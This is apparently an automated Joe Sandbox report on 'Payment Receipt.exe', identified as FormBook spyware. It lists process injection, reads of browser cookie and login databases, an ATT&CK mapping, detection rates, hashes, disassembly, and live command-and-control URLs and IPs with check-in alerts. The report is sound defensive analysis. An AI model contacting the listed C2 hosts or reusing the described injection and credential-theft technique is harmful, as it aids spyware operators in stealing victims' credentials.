              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtSetInformationProcess: Direct from: 0x76F02C5C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtCreateMutant: Direct from: 0x76F035CC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtMapViewOfSection: Direct from: 0x76F02D1C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtResumeThread: Direct from: 0x76F036AC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtReadFile: Direct from: 0x76F02ADC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtDelayExecution: Direct from: 0x76F02DDC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtQueryInformationProcess: Direct from: 0x76F02C26
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtResumeThread: Direct from: 0x76F02FBC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe NtCreateUserProcess: Direct from: 0x76F0371C
              Source: C:\Users\user\Desktop\Payment Receipt.exe Section loaded: NULL target: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\Payment Receipt.exe Section loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe protection: read write
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\fc.exe Thread register set: target process: 4960
              Source: C:\Windows\SysWOW64\fc.exe Thread APC queued: target process: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
              Source: C:\Windows\SysWOW64\fc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: MEREhDqMRRNSzT.exe, 00000004.00000002.4097647800.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000000.1941376430.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4097794735.0000000001241000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
              Source: MEREhDqMRRNSzT.exe, 00000004.00000002.4097647800.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000000.1941376430.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4097794735.0000000001241000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
              Source: MEREhDqMRRNSzT.exe, 00000004.00000002.4097647800.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000000.1941376430.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4097794735.0000000001241000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
              Source: MEREhDqMRRNSzT.exe, 00000004.00000002.4097647800.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000000.1941376430.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4097794735.0000000001241000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager

              Stealing of Sensitive Information

              Source: Yara match, File source: 0.2.Payment Receipt.exe.730000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000005.00000002.4097035326.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2016587494.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000005.00000002.4098003427.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: 00000005.00000002.4097327937.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.4097999187.0000000003030000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2016901263.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\fc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\fc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

              Remote Access Functionality

              Source: Yara match, File source: 0.2.Payment Receipt.exe.730000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000005.00000002.4097035326.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2016587494.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000005.00000002.4098003427.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: 00000005.00000002.4097327937.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.4097999187.0000000003030000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2016901263.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 312 Process Injection | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Abuse Elevation Control Mechanism | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 4 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

              Source | Detection | Scanner | Label | Link
              Payment Receipt.exe | 62% | Virustotal | | Browse
              Payment Receipt.exe | 71% | ReversingLabs | Win32.Trojan.SpywareX |
              Payment Receipt.exe | 100% | Avira | HEUR/AGEN.1318544 |
              Payment Receipt.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://www.lonfor.website/bowc/?w0DDw=KH0hz6&1V=hSFyBF7QNpd6wUow9uUe+oJ47NX8i/8WjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+/1bJOK8Z/4V5qgzDPWvLYQmptlMfzF+8/0=0%Avira URL Cloudsafe
              http://www.sonixingenuine.shop/01c7/?1V=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReHsi0Sd5n3+/SqbRiWTP8J7rQ0imHyBBNkU=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.moyu19.pro/b9e2/?1V=KXKmlftrGUnNwN71qtFvViHh9QQKT49uyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NMc1rtl+75eG21JCXkgtBEctrkJEqfktzAA=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.adadev.info/ctdy/0%Avira URL Cloudsafe
              http://cifasnc.info/8rr3/?1V=iJ8hmWjdEFuk0u09mxt/i0%Avira URL Cloudsafe
              http://www.moyu19.pro0%Avira URL Cloudsafe
              http://www.investshares.net/cf9p/0%Avira URL Cloudsafe
              http://www.grimbo.boats/kxtt/0%Avira URL Cloudsafe
              http://www.44756.pizza/a59t/0%Avira URL Cloudsafe
              http://www.nosolofichas.online/hqr6/0%Avira URL Cloudsafe
              http://www.gayhxi.info/k2i2/?1V=oYl0YuhK+EfenM8eRya5NBLYEg3QT0lWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYH71Qo8BiJAJadzAW0K4pL4P2w4s2MVD1OU=&w0DDw=KH0hz6100%Avira URL Cloudmalware
              http://www.lonfor.website/bowc/0%Avira URL Cloudsafe
              http://www.nosolofichas.online/hqr6/?1V=zX0jw1Jb7ql8GILhT0OEiPF9MmsqzXR3TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfc2GyGCINcJGtLdg83h47wzEv1WJs4WWtSs=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.44756.pizza/a59t/?1V=4xL6Q7DrxWj99jxey6XhnD59kXlzpzVjNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acuv+yDBW+TCFZeEjgS2d8Hc9PwvsiMDAZ0mc=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.moyu19.pro/b9e2/0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/0%Avira URL Cloudsafe
              http://www.grimbo.boats/kxtt/?w0DDw=KH0hz6&1V=eC1oD4IhFSd/6jtM+gh2zJzzIbkctzW5zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhx4kXv42kRkXOBgymbjdyCqqE2F8kr6Zzpg=0%Avira URL Cloudsafe
              https://www.sonixingenuine.shop/01c7/?1V=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThM0%Avira URL Cloudsafe
              http://www.sonixingenuine.shop/01c7/0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/?1V=a/HH2smDyRg6YmpKuJDswFozPckyMxHERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhjtb005hxLSZzuVPoFRXMGu9Cf/2KLmHwwY=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.investshares.net/cf9p/?1V=tknvN2jlhTuvpXXYKbatHxztD/Ub9xeLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK+f9yqapepUfG+WEuydq9lZ8Jf8Ico0paCk=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.denture-prices.click/dx3i/0%Avira URL Cloudsafe
              http://cifasnc.info/xmlrpc.php0%Avira URL Cloudsafe
              http://www.denture-prices.click/dx3i/?1V=d8Ky6hmePKhU2XxFS8oVbq/fBtR8/SXw2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdEnMsHk7sWiNdLPva59bl5hhAP4TZGe3ZV4=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.cifasnc.info/8rr3/?1V=iJ8hmWjdEFuk0u09mxt/i+URJBIu2+/oU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6nrWdXOKgOfZXH6QuC8SwJrjPV5LCLXfvVQ=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.cifasnc.info/8rr3/0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              nosolofichas.online
              84.32.84.32
              truetrue
                unknown
                www.moyu19.pro
                154.39.239.237
                truetrue
                  unknown
                  dns.ladipage.com
                  13.228.81.39
                  truefalse
                    high
                    www.cifasnc.info
                    188.114.97.3
                    truetrue
                      unknown
                      promocao.info
                      84.32.84.32
                      truetrue
                        unknown
                        www.grimbo.boats
                        104.21.18.171
                        truetrue
                          unknown
                          www.lonfor.website
                          199.192.21.169
                          truetrue
                            unknown
                            www.denture-prices.click
                            199.59.243.228
                            truetrue
                              unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1583685
Start date and time: 2025-01-03 11:38:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Payment Receipt.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/1@14/10
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 15
• Number of non-executed functions: 327
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 172.202.163.200, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target MEREhDqMRRNSzT.exe, PID 4144 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
Time | Type | Description
05:40:05 | API Interceptor | 10306194x Sleep call for process: fc.exe modified
                                                                    armv6l.elfGet hashmaliciousUnknownBrowse
                                                                    • 88.73.45.174
                                                                    loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                    • 88.66.40.190
                                                                    kwari.mips.elfGet hashmaliciousUnknownBrowse
                                                                    • 92.79.235.220
                                                                    botx.x86.elfGet hashmaliciousMiraiBrowse
                                                                    • 178.12.160.225
                                                                    botx.m68k.elfGet hashmaliciousMiraiBrowse
                                                                    • 88.66.204.59
                                                                    loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                    • 47.80.88.42
                                                                    NAMECHEAP-NETUShttp://keywestlending.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                    • 104.219.248.99
                                                                    inv#12180.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.192.21.169
                                                                    loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                    • 37.61.233.171
                                                                    https://webmail.buzja.com/?auth=byoungjo.yoo@hyundaimovex.comGet hashmaliciousHTMLPhisherBrowse
                                                                    • 198.54.116.86
                                                                    SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.236.169
                                                                    Laurier Partners Proposal.emlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 199.188.207.168
                                                                    https://supercrete.lk/m/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 199.188.200.142
                                                                    http://jonotarmot.com/dcs/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 198.54.120.20
                                                                    cali.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 198.54.122.135
                                                                    https://towergroupofcompany.com/wp-includes/blobcit.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 63.250.38.156
                                                                    No context
                                                                    No context
                                                                    Process:C:\Windows\SysWOW64\fc.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.964815883015399
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:Payment Receipt.exe
                                                                    File size:289'280 bytes
                                                                    MD5:e6bd9e9d02f848789769edcf7023e15c
                                                                    SHA1:f87837fe132810e33552511906bc35089c213f7b
                                                                    SHA256:f7e7d1d597fa001cfdfdc86c9aa5c97578b110f3598a2c9fdb4158abe760acc2
                                                                    SHA512:4dcabc0801f5840d8685548ba066319a6dcbd3b544f432f1567a9b125e344d02d41fff03c262b812f29deb17fcb45dc9d0d22e5f1386cef7006b8c80c0ca46ff
                                                                    SSDEEP:6144:H8ls/dPZs9JZY9iOKuxO9oTDFgxTFLVwkBDSiQ3ro:r/dhQJqiOKsPDOZLGeDk3r
                                                                    TLSH:D254221A9F26F206D0FD2673351F4742B671472DBEA52F21B4992CA28D90CBE5EC03B1
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L......`.................X...................p....@................
                                                                    Icon Hash:90cececece8e8eb0
                                                                    Entrypoint:0x401580
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x60E3E289 [Tue Jul 6 04:56:41 2021 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:6
                                                                    OS Version Minor:0
                                                                    File Version Major:6
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:6
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:
                                                                    Instruction
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 00000424h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    push 0000040Ch
                                                                    lea eax, dword ptr [ebp-00000420h]
                                                                    push 00000000h
                                                                    push eax
                                                                    mov dword ptr [ebp-00000424h], 00000000h
                                                                    call 00007F51E8BB51ACh
                                                                    add esp, 0Ch
                                                                    sub ecx, ecx
                                                                    xor edi, edi
                                                                    sub esi, esi
                                                                    mov dword ptr [ebp-14h], 00000054h
                                                                    mov dword ptr [ebp-10h], 00003B15h
                                                                    mov dword ptr [ebp-0Ch], 00001B0Dh
                                                                    mov dword ptr [ebp-08h], 00004BD2h
                                                                    push eax
                                                                    pop eax
                                                                    inc ecx
                                                                    push ecx
                                                                    pop eax
                                                                    and eax, 80000007h
                                                                    jns 00007F51E8BB35B7h
                                                                    dec eax
                                                                    or eax, FFFFFFF8h
                                                                    inc eax
                                                                    jne 00007F51E8BB35B4h
                                                                    add ecx, ecx
                                                                    cmp ecx, 00000CB4h
                                                                    jl 00007F51E8BB3597h
                                                                    mov ecx, 00006ACDh
                                                                    mov eax, 92492493h
                                                                    imul ecx
                                                                    add edx, ecx
                                                                    sar edx, 05h
                                                                    push edx
                                                                    pop ecx
                                                                    shr ecx, 1Fh
                                                                    add ecx, edx
                                                                    jne 00007F51E8BB359Dh
                                                                    mov eax, 00001819h
                                                                    push ebx
                                                                    pop ebx
                                                                    push 0000001Bh
                                                                    pop edx
                                                                    mov ecx, 000000C2h
                                                                    cmp ecx, edx
                                                                    cmovl ecx, edx
                                                                    dec eax
                                                                    jne 00007F51E8BB35AAh
                                                                    mov ecx, 00001F5Ah
                                                                    mov eax, 82082083h
                                                                    imul ecx
                                                                    add edx, ecx
                                                                    sar edx, 06h
                                                                    mov ecx, edx
                                                                    shr ecx, 1Fh
                                                                    add ecx, edx
                                                                    jne 00007F51E8BB359Dh
                                                                    call 00007F51E8BB540Ah
                                                                    mov dword ptr [ebp-5Ch], eax
                                                                    mov edi, edi
                                                                    inc edi
                                                                    mov eax, 55555556h
                                                                    imul edi
                                                                    Programming Language:
                                                                    • [C++] VS2012 build 50727
                                                                    • [ASM] VS2012 build 50727
                                                                    • [LNK] VS2012 build 50727
                                                                     Name | Virtual Address | Virtual Size | Is in Section
                                                                     IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                     Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                     .text | 0x1000 | 0x45694 | 0x45800 | 790a1dc9453c606dcef2ea8be0aee67e | False | 0.9886149674010791 | data | 7.995279909719649 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                     Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                     2025-01-03T11:39:10.541104+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50050 | 154.39.239.237 | 80 | TCP
                                                                     2025-01-03T11:39:10.541104+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50050 | 154.39.239.237 | 80 | TCP
                                                                     2025-01-03T11:39:44.159101+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49736 | 47.83.1.90 | 80 | TCP
                                                                     2025-01-03T11:39:44.159101+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49736 | 47.83.1.90 | 80 | TCP
                                                                     2025-01-03T11:39:59.788721+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49773 | 84.32.84.32 | 80 | TCP
                                                                     2025-01-03T11:40:02.382659+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49788 | 84.32.84.32 | 80 | TCP
                                                                     2025-01-03T11:40:05.143650+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49805 | 84.32.84.32 | 80 | TCP
                                                                     2025-01-03T11:40:07.550751+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49824 | 84.32.84.32 | 80 | TCP
                                                                     2025-01-03T11:40:07.550751+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49824 | 84.32.84.32 | 80 | TCP
